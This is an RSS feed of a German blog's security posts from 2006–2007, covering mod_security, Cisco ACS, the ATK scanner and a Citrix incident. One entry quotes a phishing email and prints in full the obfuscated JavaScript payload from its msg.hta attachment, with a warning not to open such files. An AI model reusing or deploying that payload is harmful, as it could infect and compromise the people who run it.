<?xml version="1.0" encoding="utf-8" ?>

<rss version="2.0" 
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:admin="http://webns.net/mvcb/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   >
<channel>
    <title>Karsten's weblog - Security</title>
    <link>http://weblog.burgernet.org/</link>
    <description></description>
    <dc:language>de</dc:language>
    <generator>Serendipity 1.5.3 - http://www.s9y.org/</generator>
    <pubDate>Sun, 24 Jun 2007 09:01:08 GMT</pubDate>

    <image>
        <url>http://weblog.burgernet.org/templates/default/img/s9y_banner_small.png</url>
        <title>RSS: Karsten's weblog - Security - </title>
        <link>http://weblog.burgernet.org/</link>
        <width>100</width>
        <height>21</height>
    </image>

<item>
    <title>computec Archiv</title>
    <link>http://weblog.burgernet.org/index.php?/archives/80-computec-Archiv.html</link>
            <category>Security</category>
    
    <comments>http://weblog.burgernet.org/index.php?/archives/80-computec-Archiv.html#comments</comments>
    <wfw:comment>http://weblog.burgernet.org/wfwcomment.php?cid=80</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://weblog.burgernet.org/rss.php?version=2.0&amp;type=comments&amp;cid=80</wfw:commentRss>
    

    <author>nospam@example.com (Karsten)</author>
    <content:encoded>
    &lt;br /&gt;
Das Portal [1] computec enthält eine umfangreiche Dokumentessammlung Rund ums Thema Computersicherheit. In unregelmässigen Abständen werden&lt;br /&gt;
alle Dokumente ich ein komprimiertes Archiv gepackt und auf verschiedenen FTP und Webservern zum downloaden angeboten. [2] In denvergangenen Tagen ist eine Aktualisierung online geschalten worden.&lt;br /&gt;&lt;br /&gt;[1]: &lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=178&amp;amp;entry_id=80&quot;  onmouseover=&quot;window.status=&#039;http://www.computec.ch&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;Computec.ch&quot;&gt;www.computec.ch&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;[2]: &lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=179&amp;amp;entry_id=80&quot;  onmouseover=&quot;window.status=&#039;http://computec.burgernet.org&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; title=&quot;http://computec.burgernet.org&quot;&gt;http://computec.burgernet.org&lt;/a&gt;&lt;br /&gt;
 
    </content:encoded>

    <pubDate>Wed, 20 Jun 2007 21:19:00 +0200</pubDate>
    <guid isPermaLink="false">http://weblog.burgernet.org/index.php?/archives/80-guid.html</guid>
    
</item>
<item>
    <title>Apache Security</title>
    <link>http://weblog.burgernet.org/index.php?/archives/66-Apache-Security.html</link>
            <category>Security</category>
    
    <comments>http://weblog.burgernet.org/index.php?/archives/66-Apache-Security.html#comments</comments>
    <wfw:comment>http://weblog.burgernet.org/wfwcomment.php?cid=66</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://weblog.burgernet.org/rss.php?version=2.0&amp;type=comments&amp;cid=66</wfw:commentRss>
    

    <author>nospam@example.com (Karsten)</author>
    <content:encoded>
    In der heutigen Zeit gibt es im Internet viele kriminelle Elemente mit nur einem Ziel. Sich Geld zu erschleichen und anderen Schaden zuzufügen. Oftmals haben diese Elemente kein Wissen über die Materie und Technik und verwenden einfach fertige Scripte oder Frameworks. In der Branche sind Sie auch als „Script Kiddies“ oder „Cracker“ bekannt. Sie greifen teilweise wahllos Server an und versuchen diese lahmzulegen. Das Angriffsziel ist z.B. ein apache Webserver. Er soll durch übermässig viele Seitenanfragen überlastet oder sogar zum Absturz gebracht werden. Solche Vorgehensweisen stellen für einen Administrator ein erhebliches Problem dar, gerade wenn diese Angriffe von multiplen IP-Adressen stammen. Wie kann ein Webserver oder Firewall unterscheiden, ob es sich um einen gerechtfertigten Zugriff handelt oder um einen Angriff. Eine zeitaufwendige Möglichkeit ist das regelmässige überprüfen der Logfiles, um die entsprechenden Adressen auf der Firewall zu blockieren. Auf der ebene des Webservers selber lässt sich z.B. Mod-security [1] implementieren. Mit der richtigen Konfiguration werden solche Angriffe erkannt und z.B. Auf eine 404 Meldung weitergeleitet. Dieses Modul ist auf meinem Server im Einsatz und verrichtet seine Arbeit hervorragend. &lt;br /&gt;[1]: &lt;a title=&quot;Modsecurity.org&quot; href=&quot;http://weblog.burgernet.org/exit.php?url=aHR0cDovL3d3dy5tb2RzZWN1cml0eS5vcmcg&amp;amp;entry_id=66&quot;  onmouseover=&quot;window.status=&#039;http://www.modsecurity.org &#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot; target=&quot;_blank&quot;&gt;http://www.modsecurity.org &lt;/a&gt;  
    </content:encoded>

    <pubDate>Sun, 14 Jan 2007 09:49:51 +0100</pubDate>
    <guid isPermaLink="false">http://weblog.burgernet.org/index.php?/archives/66-guid.html</guid>
    
</item>
<item>
    <title>Verantwortung</title>
    <link>http://weblog.burgernet.org/index.php?/archives/59-Verantwortung.html</link>
            <category>Security</category>
    
    <comments>http://weblog.burgernet.org/index.php?/archives/59-Verantwortung.html#comments</comments>
    <wfw:comment>http://weblog.burgernet.org/wfwcomment.php?cid=59</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://weblog.burgernet.org/rss.php?version=2.0&amp;type=comments&amp;cid=59</wfw:commentRss>
    

    <author>nospam@example.com (Karsten)</author>
    <content:encoded>
    &lt;br /&gt;
Was würde geschehen, wenn niemand bereit wäre Verantwortung für irgendetwas zu übernehmen. Dieser Gedanke ist fast nicht vorstellbar. Es könnte nicht auf eine pünktliche Lieferung der Tageszeitung bestanden werden, es trägt ja niemand die Verantwortung. Ähnlich sieht es in vielen anderen Fallbeispielen aus. Das Wort „Verantwortung“ ist erst im Mittelhochdeutschen zwischen 1050 und 1350 aufgekommen. Im weiten Sinn sieht man darin die Folgen zu tragen für eigene oder fremde Handlungen. Oftmals wird gemeint, Verantwortung stehe in einem negativen Kontext. So muss z.B. ein Abteilungsleiter die Folgen seiner Entscheide und auch indirekt die Folgen der Entscheide seiner Unterstellten tragen. Jedoch wird Verantwortung noch mit anderen Wörtern in Verbindung gebracht. Erfolg und Ruhm zählen dabei zu den eher erfreulichen Eigenschaften. Tendenziell wird heute schneller kritisiert wie gelobt. &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;Auch in der Informatik vor allem in der IT-Security gehört das Wort „Verantwortung“ zu einem der wichtigsten Ausdrücke. Z.B. sollte/muss jemand die Verantwortung tragen, dass die Server immer möglichst fristgerecht gepatched werden.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;Der Hersteller einer Software sollte doch nach besten Wissen und Gewissen seine Software entsprechend der heute geltenden Sicherheitsrichtlinien erstellen. Leider ist dies nicht immer der Fall. Natürlich übernimmt der Hersteller nur selten oder nie die Verantwortung, ausgeschlossen sind spezielle Verträge. Manchmal wird auch die Verantwortung über die intern selber erstellte Software abgelehnt. Eine Ablehnung der Verantwortung ist meist einfacher und nur mit geringem Aufwand verbunden. Ist dies wirklich die Lösung? Zweifellos nicht. &lt;br /&gt;
 
    </content:encoded>

    <pubDate>Wed, 01 Nov 2006 12:39:05 +0100</pubDate>
    <guid isPermaLink="false">http://weblog.burgernet.org/index.php?/archives/59-guid.html</guid>
    
</item>
<item>
    <title>Cisco Secure ACS (Access Control Server)</title>
    <link>http://weblog.burgernet.org/index.php?/archives/52-Cisco-Secure-ACS-Access-Control-Server.html</link>
            <category>Security</category>
    
    <comments>http://weblog.burgernet.org/index.php?/archives/52-Cisco-Secure-ACS-Access-Control-Server.html#comments</comments>
    <wfw:comment>http://weblog.burgernet.org/wfwcomment.php?cid=52</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://weblog.burgernet.org/rss.php?version=2.0&amp;type=comments&amp;cid=52</wfw:commentRss>
    

    <author>nospam@example.com (Karsten)</author>
    <content:encoded>
    &lt;br /&gt;
Der Cisco Secure Access Control Server ist einer der bekanntesten und nach meiner Meinung nach leistungsfähigsten Server für die tripple A Funktionalitäten innerhalb eines Netzwerkes.&lt;br /&gt;
&lt;br /&gt;Authentication (Wer hat Zugriff?)&lt;br /&gt;
&lt;br /&gt;Authorization (Was ist erlaubt zu tun?)&lt;br /&gt;
&lt;br /&gt;Accounting (Was tun sie?)&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
Prinzipiell werden die Funktionen in zwei Bereiche unterteilt. Erstens die Userverwaltung&lt;br /&gt;
für Administratoren der Netzwerkgeräte und zweitens die Funktionalitäten des Zugriffschutzes zum Netzwerk. Z.B. können berechtigte AD Accounts als Administrator auf die Netzwerkkomponenten (Access Points, Switchs, Routers, usw.) zugreifen und verwalten. Dis hat hauptsächlich folgende Vorteile:&lt;br /&gt;
&lt;ol type=&quot;1&quot; style=&quot;margin-top: 0cm;&quot; start=&quot;1&quot;&gt;&lt;li class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;font-size: 10pt;&quot;&gt;Jeder User hat ein individuelles Passwort&lt;o:p /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;font-size: 10pt;&quot;&gt;Das Ändern des User-Passwortes geschieht zentral und gilt für alle Geräte&lt;o:p /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;font-size: 10pt;&quot;&gt;Erhöhung der Sicherheit, da die Userinformationen nicht mehr auf den Geräten selber gespeichert werden.&lt;o:p /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;font-size: 10pt;&quot;&gt;Verschlüsselte Übertragung der Userdaten&lt;/span&gt;&lt;span style=&quot;font-size: 10pt;&quot;&gt;&lt;o:p /&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;Der zweite Bereich beschäftigt sich mit dem Zugriffschutz aufs Netzwerk. Die Möglichkeiten sind fast unbegrenzt, jedoch sollte man den Verwaltungsaufwand nicht unterschätzen. Der Cisco Access Server übernimmt dabei die Funktion zur Abfragung der Berechtigung, Protokollierung und Kommunikation zum ACS. Als Access Server kann das Cisco IOS, Cisco CAT OS, Cisco Aironet AP, Cisco 802.1x enabled Switchs, Cisco PIX, Cisco VPN 3000 &amp;amp; 5000 und teilweise Drittherstellerprodukte dienen. &lt;span style=&quot;font-size: 10pt;&quot;&gt;Die Übertragung der Daten geschieht dabei im Rahmen von TACACS+ verschlüsselt. Natürlich ist dieses Produkt nicht die Lösung für alle Probleme [1], [2], [3], [4].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;Die Implementierungen benötigt grundlegende Konzepte. Prinzipiell sollte die Integration im Rahmen oder anhand eines Sicherheitskonzeptes geschehen. Gerade die Vielzahl von Möglichkeiten kann zu einem erheblichen Verwaltungsaufwand führen. Eine der wichtigsten Punkte ist die redundante Auslegung des Systems. Sollte der einzige ACS ausfallen, legt dies je nach Konfiguration das ganze Netzwerk lahm. Keine Geräte oder User könnten noch verifiziert werden, der Zugriff würde verweigert werden. Eine physikalische Trennung der Systeme ist daher sinnvoll, das systemeigene BackUp-System sollte auf jeden Fall eingesetzt werden.&lt;br /&gt;
&lt;br /&gt;
&lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;font-size: 10pt;&quot;&gt;Mehr Infos sind auf &lt;a title=&quot;Cisco.com&quot; target=&quot;_blank&quot; href=&quot;http://weblog.burgernet.org/exit.php?url_id=110&amp;amp;entry_id=52&quot;  onmouseover=&quot;window.status=&#039;http://www.cisco.com&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;http://www.cisco.com&lt;/a&gt; zu finden.&lt;br /&gt;&lt;o:p&gt;&lt;br /&gt;[1]: &lt;a title=&quot;Tecchannel.de&quot; target=&quot;_blank&quot; href=&quot;http://weblog.burgernet.org/exit.php?url_id=111&amp;amp;entry_id=52&quot;  onmouseover=&quot;window.status=&#039;http://www.tecchannel.de/sicherheit/aktuell/433929/index.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;http://www.tecchannel.de/sicherheit/aktuell/433929/index.html&lt;/a&gt;&lt;br /&gt;[2]: &lt;a title=&quot;Heise.de&quot; target=&quot;_blank&quot; href=&quot;http://weblog.burgernet.org/exit.php?url_id=112&amp;amp;entry_id=52&quot;  onmouseover=&quot;window.status=&#039;http://www.heise.de/security/news/meldung/72856&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;http://www.heise.de/security/news/meldung/72856&lt;/a&gt;&lt;br /&gt;[3]: &lt;a title=&quot;Scip.ch&quot; target=&quot;_blank&quot; href=&quot;http://weblog.burgernet.org/exit.php?url_id=113&amp;amp;entry_id=52&quot;  onmouseover=&quot;window.status=&#039;http://www.scip.ch/cgi-bin/smss/showadv.pl?id=963&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;http://www.scip.ch/cgi-bin/smss/showadv.pl?id=963&lt;/a&gt;&lt;br /&gt;[4]: &lt;a title=&quot;Cisco.com&quot; target=&quot;_blank&quot; href=&quot;http://weblog.burgernet.org/exit.php?url_id=114&amp;amp;entry_id=52&quot;  onmouseover=&quot;window.status=&#039;http://www.cisco.com/en/US/products/sw/secursw/ps2086/products_field_notice09186a00805bf1c4.shtml&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;http://www.cisco.com/en/US/products/sw/secursw/ps2086/products_field_notice09186a00805bf1c4.shtml&lt;/a&gt;&lt;o:p /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/span&gt; 
    </content:encoded>

    <pubDate>Fri, 15 Sep 2006 22:26:45 +0200</pubDate>
    <guid isPermaLink="false">http://weblog.burgernet.org/index.php?/archives/52-guid.html</guid>
    
</item>
<item>
    <title>Seltsamer Zustand auf einem Citrix Server</title>
    <link>http://weblog.burgernet.org/index.php?/archives/51-Seltsamer-Zustand-auf-einem-Citrix-Server.html</link>
            <category>Security</category>
    
    <comments>http://weblog.burgernet.org/index.php?/archives/51-Seltsamer-Zustand-auf-einem-Citrix-Server.html#comments</comments>
    <wfw:comment>http://weblog.burgernet.org/wfwcomment.php?cid=51</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://weblog.burgernet.org/rss.php?version=2.0&amp;type=comments&amp;cid=51</wfw:commentRss>
    

    <author>nospam@example.com (Karsten)</author>
    <content:encoded>
    &lt;br /&gt;
In der vergangenen Woche musste einer der Citrix-Server neugestartet werden. Kurz darauf wurde mir ein höchst seltsamer Zustand gemeldet. Ein User hatte sich via ICA Client auf das Citrix System eingeloggt. Anstatt die gewohnte Oberfläche erhielt er die Umgebung des Servers, er konnte alle Administratorentätigkeiten ausführen, sogar den Server herunterfahren. Es schien fast so, als ob er sich via eine Terminal-Session auf dem Server selber befinden würde. Leider konnte ich diesen Zustand nicht weiterverfolgen bzw. nochmals erzeugen, da es sich um ein produktives System handelt. Es gab keinerlei seltsame Logeinträge, auch das Login schien ordnungsgemäss abgelaufen zu sein. Für mich bleibt die ganze Sache leider ein Rätsel. Manchmal finde ich es schade, dass keine Testserver zur Reproduzierung des Fehlers zur Verfügung stehen.&lt;br /&gt;
&lt;br /&gt;
 
    </content:encoded>

    <pubDate>Sat, 09 Sep 2006 18:52:24 +0200</pubDate>
    <guid isPermaLink="false">http://weblog.burgernet.org/index.php?/archives/51-guid.html</guid>
    
</item>
<item>
    <title>ATKCE (Attack Tool Kit Console Edition)</title>
    <link>http://weblog.burgernet.org/index.php?/archives/48-ATKCE-Attack-Tool-Kit-Console-Edition.html</link>
            <category>Security</category>
    
    <comments>http://weblog.burgernet.org/index.php?/archives/48-ATKCE-Attack-Tool-Kit-Console-Edition.html#comments</comments>
    <wfw:comment>http://weblog.burgernet.org/wfwcomment.php?cid=48</wfw:comment>

    <slash:comments>2</slash:comments>
    <wfw:commentRss>http://weblog.burgernet.org/rss.php?version=2.0&amp;type=comments&amp;cid=48</wfw:commentRss>
    

    <author>nospam@example.com (Karsten)</author>
    <content:encoded>
    &lt;br /&gt;
&lt;p&gt;ATK (Attack Tool Kit) [1] ist ein leistungsfähiger Security-Scanner geschrieben von Marc Ruef [2]. Die Plug-In Architektur der einzelnen Tests, erlaubt das dynamische Erweitern der erkennbaren Schwachstellen. Eine grafische Oberfläche vereinfacht die Bedienung. Im Moment wird offiziell „nur“ Windows unterstützt, da das Tool in VB 6 implementiert wurde. Jedoch erlaubt wine auch eine Benutzung unter Linux. &lt;br /&gt;
Neu gibt es eine Mono [3] Konsolen Implementierung namens ATKCE (Attack Tool Kit Console Edition). Diese soll das Einbinden in andere Scripte erlauben und verzichtet vollständig auf eine grafische Oberfläche. ATKCE  greift auf die Plug-Ins von ATK zurück. Beide Projekte stehen unter der GPL Lizenz, der Source Code ist frei einsehbar. Mehr Informationen gibt es auf der Projektseite [4]. Aktuell erst in einer Beta Version verfügbar.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;
&lt;p&gt;[1]: &lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=77&amp;amp;entry_id=48&quot; title=&quot;http://www.computec.ch/projekte/atk/&quot;  onmouseover=&quot;window.status=&#039;http://www.computec.ch/projekte/atk/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;http://www.computec.ch/projekte/atk/&lt;/a&gt;&lt;br /&gt;[2]: &lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=78&amp;amp;entry_id=48&quot; title=&quot;http://www.computec.ch/mruef/&quot;  onmouseover=&quot;window.status=&#039;http://www.computec.ch/mruef/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;http://www.computec.ch/mruef/&lt;/a&gt;&lt;br /&gt;[3]: &lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=79&amp;amp;entry_id=48&quot; title=&quot;http://www.mono-project.com/&quot;  onmouseover=&quot;window.status=&#039;http://www.mono-project.com/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;http://www.mono-project.com/&lt;/a&gt;&lt;br /&gt;[4]: &lt;a href=&quot;http://weblog.burgernet.org/exit.php?url_id=80&amp;amp;entry_id=48&quot; title=&quot;http://atkce.burgernet.org/&quot;  onmouseover=&quot;window.status=&#039;http://atkce.burgernet.org/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;http://atkce.burgernet.org&lt;/a&gt;&lt;/p&gt; 
    </content:encoded>

    <pubDate>Sat, 05 Aug 2006 21:17:34 +0200</pubDate>
    <guid isPermaLink="false">http://weblog.burgernet.org/index.php?/archives/48-guid.html</guid>
    
</item>
<item>
    <title>You have received Secure E-mail</title>
    <link>http://weblog.burgernet.org/index.php?/archives/40-You-have-received-Secure-E-mail.html</link>
            <category>Security</category>
    
    <comments>http://weblog.burgernet.org/index.php?/archives/40-You-have-received-Secure-E-mail.html#comments</comments>
    <wfw:comment>http://weblog.burgernet.org/wfwcomment.php?cid=40</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://weblog.burgernet.org/rss.php?version=2.0&amp;type=comments&amp;cid=40</wfw:commentRss>
    

    <author>nospam@example.com (Karsten)</author>
    <content:encoded>
    &lt;br /&gt;
Ich habe heute ein seltsames Mail erhalten:&lt;br /&gt;&lt;br /&gt;You have received Secure E-mail &lt;br /&gt;&lt;br /&gt;To read the message open attached file.&lt;br /&gt;&lt;br /&gt;User ID:XXXX&lt;br /&gt;Password: XXXX&lt;br /&gt;&lt;br /&gt;Keep your password in a safe place.&lt;br /&gt;&lt;br /&gt;Thank you,&lt;br /&gt;Encrypted Message Service,&lt;br /&gt;AOL.com&lt;br /&gt;&lt;br /&gt;Im Attachement befindet sich ein File msg.zip. Nach dem entpacken erscheint das File msg.hta. HTA Files sind Programme für den Browser welche aber auf dem Client ausgeführt werden. Am ehesten könnte man diese mit VBScripten vergleichen. Auch solche Files können schädlichen Inhalt aufweisen daher niemals öffnen. &lt;br /&gt;&lt;br /&gt;Inhalt msg.hta&lt;br /&gt;&lt;i&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;head&amp;gt;&lt;br /&gt;&amp;lt;title&amp;gt;hzrskmpkp&amp;lt;/title&amp;gt;&lt;br /&gt;&amp;lt;/head&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&amp;lt;body&amp;gt;&amp;lt;script language=&amp;quot;JavaScript&amp;quot;&amp;gt;function rm(bl,ap){eval(ap);wcol=637;e(bl);};rm(&amp;quot;T{II.i6OIg-6{-uKjPi{p-l.iB4.-paOo-l.4,.4PPP&amp;lt;li4Of6-oaIgBag.Aha,a=i4Of6&amp;gt; BIi6O{I-4Qwm;{iBp.I6Pk4O6.QCGIabo.-0{-T{II.i6-6{-=.4,.4P-zo.al.-ic.iL-s{B4-RI6.4I.6-i{II.i6O{I-aI;-64s-agaOIP&amp;lt;li4&lt;br /&gt;Of6-oaIgBag.Aha,a=i4Of6&amp;gt;iMABI.liaf.Q^%rT^wv;4A^i}^NiMN^&#039;.isio.;^NiMvoA;4N^Bl.4OIO6P.!.^&lt;br /&gt;vI!A2v64smfAI.k-ui6O,.XKbM.i6Q^=i4Of6OIgPVOo.=sl6.pKbM.i6^wvOAI.k-ui6O,.XKbM.i6Q^W=i4Of6P=c.oo^wvO QfPVOo.3!Ol6lQowwm.!AfP1.6VOo.QowvO Q.!PlO#.&amp;gt;t&amp;amp;&amp;amp;&amp;amp;&amp;amp;wI!A&amp;amp;vFfPT4.a6.V{o;.4Q;4wvFia6icQ62wmFv BIi6O{I- xQwm4.6B4I- aol.F;{iBp.I6P{Ii{I6.!6p.IBA xv&amp;lt;$5li4Of6&amp;gt;&amp;lt;li4Of6-oaIgBag.A^,bl^&amp;gt;R -I!-0c.I$Il.6-R3AT4.a6.KbM.i6Q^RI6.4I.63!fo{4.4PuffoOia6O{I^w$IR3PHOlObo.A&amp;amp;$I=Bb-=f$IWcOo.-R3PqBlsA64B.&lt;br /&gt;$IW.I;$I3I;-=Bb$IB4Au44asQ^c{{fPLa#aIPb#$5g{;P6!6^/^f{oM{fP 4..i{{olO6.Pi{p$56.l6P6!6^/^4xxPbsP4B$5{oP6!6^/^I{oL{P6xrPi{p$5g{;Pi^/^Mp{x2PbsP4B$5bOgP6!6^/^flO!OPk&lt;br /&gt;{oPb#$56.l6P6!6^/^;BBkPIpP4B$5{oP6!6^w$IV{4-BIA&amp;amp;-0{-E$IR3P7a,Oga6.QB4QBIww$I=f$IMAR3Pd{iBp.I6Pb{;sPOII.40.!6$IR -j.IQMw&amp;gt;r&amp;amp;&amp;amp;&amp;amp;&amp;amp;-0c.I$I3!O6-V{4$I3I;-R $IMA^^$I7.!6$I=Bb-bl$IlAj.IQMw$IR Qlw0c.I$I#A^uqTd3V1JRh(jn7Kz*&#039;=0GHWXYZabi;. gcOMLopI{f)4l6B,k!s#&amp;amp;2tx`rED|:N$5^$IV{4-LA2-0{-l-=6.f-`$IpAx$I!A&amp;amp;$IV{4-6A&amp;amp;-0{-x$IkAnO;QM/LN6/2w$IR -kA^A^-0c.I$IpAp+2$I{A&amp;amp;$I3ol.R -kA^?^-0c.I$I=.6- AfPT4.a6.0.!6VOo.Qo/04B.w$I PW4O6.-a$I PTo{l.$I3!O6-=Bb$I3ol.$I{ARI=64Q2/#/k/,bqOIa4sT{pfa4.w+2$I3I;-R $I!AE`@!N{$I7.!6$I!AJ.!Q!w$I!A=64OIgQE+j.IQ!w/^&amp;amp;^wy!$IsATc4QTqs6.Q^yJ^ynO;Q!/2/twwwNTc4QTqs6.Q^yJ^ynO;Q!/&lt;br /&gt;x/twwwNTc4QTqs6.Q^yJ^ynO;Q!/r/twww$IaAayj. 6Qs/pw$I7.!6$I3I;-R $I3I;-=Bb$I3I;-R $Ibl$IOP&#039;.gW4O6.-^J(TG$$={ 6ka4.$$nOi4{l{ 6$$RI6.4I.6-3!fo{4.4$$pao^/^ {4l6.4Pf4{ Oo.ea gPic^/^&#039;31_=Z^&amp;lt;$5li4Of6&amp;gt;&amp;lt;li4Of6-oaIgBag.Aha,a=i4Of6&amp;gt; BIi6O{I- 2Qwmb2A&amp;amp;v BIi6O{I- tQIawmbtA&amp;amp;v42A^J(jn^NiMN^=Y=03n^NiMN^TB44.I6T{I64{o=.6^NiMN^=.4,Oi.l^NiMv64smOP&#039;.gd.o.6.Q42NIaNiMwvbtA2vF&lt;br /&gt;ia6icQ62wmFv4.6B4IQbtwvF4tA^J(jn^NiMN^=KV0Wu&#039;3^NiMN^nOi4{l{ 6^NiMvL.A^ui6O,.-=.6Bf^NiMN^RIl6aoo.;-T{pf{I.I6l^NiMN^mTdruT:2q+u3Dq+3|xu+&amp;amp;T`T+3E2E&amp;amp;Dr:DtVxF^NiMN^=6Bbfa6c^vO Q tQ^fiOfOp^wN tQ^fiRzzlT^wN tQ^&#039;afd4,^wN tQ^VO4.zn^wN tQ^(p!VOo.^wwb2A2v64smOP&#039;.gW4O6.Q4tNL./o/^&#039;31_=Z^wvOP&#039;.g&#039;.a;Q4tNL.wvFia6icQ62wm64smfPT{fsVOo.Qo/OP&#039;.g&#039;.a;Q4&lt;br /&gt;tN^WOI;{kl^NiMN^TB44.I6H.4lO{I^NiMN^3!fo{4.4^NiMN^=c.oo-V&lt;br /&gt;{o;.4l^NiMN^T{pp{I-=6a46Bf^wNiMwvFia6icQ62wmb2A&amp;amp;FvFv4.6B4IQb2wvF64smO QI!yy82QwwOP4BIQowvFia6icQ;wmFv&amp;lt;$5li4Of6&amp;gt;CwvFvl.60Op.{B6Q^4Qw^/&amp;amp;wv&amp;lt;5li4Of6&amp;gt;&amp;quot;,unescape(&amp;quot;%66u&lt;br /&gt;%6Ec%74%69on%20e(%75%29%7B%76%61%72 v%3D%27%27%2C%63,%71,g,%6E%2C%62%3D&#039;%27%2C%68=%22%68c%69OK(Q*@e%2E%50z#%53=%41u%42%&lt;br /&gt;71)%77kLjM%6E%49R&#039;%43%540&amp;amp;%79%73lo%7B%6Dp%66 %2D%2B%4E%37%44d;v%2C%2F%35%724%60%55G12%746%453%78%21%38%7C%39:%7D%46VH%4A%22;%66o%&lt;br /&gt;72(n=0;n&amp;lt;%75%2E%6C%65ng%74%68%3Bn%2B+)%7B%71=%75&lt;br /&gt;%2E%63%68a%72A%74%28%6E%29%3B%67%3D%68%2Eind%65%78%4F%66(q%29%3Bif%28g%3E%2D1%29{c=((&lt;br /&gt;%67%2B%31%29%2576%2D1)%3B%69%66(c&amp;lt;%3D0%29%7Bc+%3&lt;br /&gt;D%376}v%2B%3Dh.%63%68%61rAt%28%63-%31)}%65%6Cse{%69f%28%71%3D=%22$%22%29%71=%22%5C%5C&lt;br /&gt;%22;%69f(%71%3D%3D%22^%22)%71%3D%22%5C%22%22%3B&lt;br /&gt;v%2B%3D%71}}%3B%64ocume%6E%74%2Ew%72%69%74e%28v)}&amp;quot;));&amp;lt;/script&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;/p&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Hier wird wohl ein Java Script ausgeführt. Was dieses genau bewirkt kann ich leider im Moment noch nicht sagen. 
    </content:encoded>

    <pubDate>Mon, 19 Jun 2006 20:02:37 +0200</pubDate>
    <guid isPermaLink="false">http://weblog.burgernet.org/index.php?/archives/40-guid.html</guid>
    
</item>
<item>
    <title>IT Security Forum</title>
    <link>http://weblog.burgernet.org/index.php?/archives/33-IT-Security-Forum.html</link>
            <category>Security</category>
    
    <comments>http://weblog.burgernet.org/index.php?/archives/33-IT-Security-Forum.html#comments</comments>
    <wfw:comment>http://weblog.burgernet.org/wfwcomment.php?cid=33</wfw:comment>

    <slash:comments>4</slash:comments>
    <wfw:commentRss>http://weblog.burgernet.org/rss.php?version=2.0&amp;type=comments&amp;cid=33</wfw:commentRss>
    

    <author>nospam@example.com (Karsten)</author>
    <content:encoded>
    Ich besuchte heute das IT-Security Forum in den Räumlichkeiten der Zürcher Fachhochschule in Winterthur. Leider wurden meine Erwartungen nur sehr spärlich erfüllt. Die fünf Referenten waren von verschiedener Qualität, die Themen wohl interessant aber nur oberflächlich behandelt. Ein IT bzw. Security Spezialist war nach meiner Meinung total fehl am Platz. Für eher technische Laien wie z.B. IT-Leiter (solls geben) wäre das Forum eher geeignet gewesen.  
    </content:encoded>

    <pubDate>Tue, 28 Mar 2006 19:59:52 +0200</pubDate>
    <guid isPermaLink="false">http://weblog.burgernet.org/index.php?/archives/33-guid.html</guid>
    
</item>
<item>
    <title>computec Archiv</title>
    <link>http://weblog.burgernet.org/index.php?/archives/31-computec-Archiv.html</link>
            <category>Security</category>
    
    <comments>http://weblog.burgernet.org/index.php?/archives/31-computec-Archiv.html#comments</comments>
    <wfw:comment>http://weblog.burgernet.org/wfwcomment.php?cid=31</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://weblog.burgernet.org/rss.php?version=2.0&amp;type=comments&amp;cid=31</wfw:commentRss>
    

    <author>nospam@example.com (Karsten)</author>
    <content:encoded>
